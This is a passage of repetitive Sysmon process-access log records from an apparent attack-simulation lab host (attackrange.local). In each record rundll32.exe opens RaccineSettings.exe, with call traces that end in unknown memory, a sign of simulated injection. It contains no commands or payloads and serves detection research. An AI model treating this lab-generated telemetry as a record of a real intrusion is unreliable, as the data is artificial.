Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003534Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003533Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003532Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003531Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003530Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003529Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003528Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003527Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003526Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003525Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003524Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003523Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003522Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.481{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003521Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003520Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003519Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003518Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003517Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003516Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003515Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003514Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003513Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003512Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003511Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003510Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003509Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003508Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003507Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003506Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003505Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003504Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003503Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003502Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003501Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003500Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003499Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003498Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003497Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003496Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003495Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003494Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003493Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003492Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003491Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003490Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003489Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003488Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003487Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003486Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003485Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003484Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003483Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003482Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003481Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003480Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003479Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003478Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003477Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003476Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.480{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003475Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003474Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003473Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003472Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003471Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.479{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 